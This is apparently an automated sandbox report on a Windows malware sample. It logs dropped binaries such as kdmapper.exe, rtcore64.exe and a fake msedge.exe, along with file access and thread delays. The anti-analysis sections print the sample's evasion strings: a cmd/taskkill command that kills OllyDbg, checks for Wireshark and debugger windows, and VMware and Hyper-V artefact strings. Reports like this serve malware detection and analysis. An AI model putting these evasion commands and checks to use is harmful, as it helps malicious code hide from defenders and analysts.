Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\kdmapper.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\rtcore64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: rtcore64.exe PID: 2220, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&1L 2>&1
Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&1
Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&1UN3Z
Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&12>&1
Source: Null.27.dr	Binary or memory string: ERROR: THE PROCESS "OLLYDBG.EXE" NOT FOUND.
Source: UY9hUZn4CQ.exe, 00000000.00000002.3718839265.0000023C00D73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\CMD.EXE /C TASKKILL /F /IM OLLYDBG.EXE >NUL 2>&12>&19N

Source: C:\Windows\Speech\physmeme.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 4AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 2970000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 4970000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 50D0000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 60D0000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 6200000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 7200000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 7690000 memory reserve \| memory write watch
Source: C:\Windows\Speech\rtcore64.exe	Memory allocated: 8690000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: F00000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1A9D0000 memory reserve \| memory write watch

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 840

Jump to behavior

Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MQshNARH.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ITDiARjW.log	Jump to dropped file
Source: C:\Windows\Speech\rtcore64.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oLoCRyrD.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QGjYUwSA.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XEXXxLMp.log	Jump to dropped file

Source: C:\Windows\Speech\imxyvi.exe

API coverage: 3.4 %

Source: C:\Windows\Speech\physmeme.exe TID: 7616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe TID: 2952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Edge\msedge.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Code function: 0_2_00007FF60C482858 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF60C482858
Source: C:\Windows\Speech\imxyvi.exe	Code function: 28_2_00007FF6A953A518 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	28_2_00007FF6A953A518
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00ECA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	52_2_00ECA69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	52_2_00EDC220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 52_2_00EEB348 FindFirstFileExA,	52_2_00EEB348
Source: C:\Windows\Speech\rtcore64.exe	Code function: 65_2_6D072A2D FindFirstFileExW,	65_2_6D072A2D

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EDE6A3 VirtualQuery,GetSystemInfo,

52_2_00EDE6A3

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477

Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Edge\msedge.exe	File opened: C:\Users\user

Source: Amcache.hve.46.dr	Binary or memory string: VMware
Source: RegAsm.exe, 0000002F.00000002.1500499974.0000000001194000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Amcache.hve.46.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.46.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.46.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.46.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.46.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.46.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.46.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 0000002F.00000002.1499818933.0000000001145000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1500499974.0000000001194000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000930000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.46.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: curl.exe, 00000015.00000003.1318843560.000001FE19AB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.00000000008FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: curl.exe, 0000001F.00000003.1395457647.000001EC889B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: Amcache.hve.46.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.46.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.46.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: curl.exe, 00000029.00000003.1458369540.000001F5B21A2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1494320625.000002E955E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.46.dr	Binary or memory string: vmci.sys
Source: kdmapper.exe, 00000034.00000003.1482542387.0000000000B21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.46.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.46.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.46.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.46.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.46.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.46.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.46.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.46.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.46.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.46.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.46.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.46.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.46.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.46.dr	Binary or memory string: VMware Virtual RAM
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000930000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: Amcache.hve.46.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.46.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Speech\kdmapper.exe

API call chain: ExitProcess graph end node

Source: C:\Edge\msedge.exe

Process information queried: ProcessInformation

Anti Debugging

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Open window title or class name: the wireshark network analyzer
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Open window title or class name: ollydbg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 47_2_00446730 LdrInitializeThunk,

47_2_00446730

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

Code function: 0_2_00007FF60C483728 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF60C483728

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EE7DEE mov eax, dword ptr fs:[00000030h]

52_2_00EE7DEE

Source: C:\Windows\Speech\kdmapper.exe

Code function: 52_2_00EEC030 GetProcessHeap,

52_2_00EEC030

Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
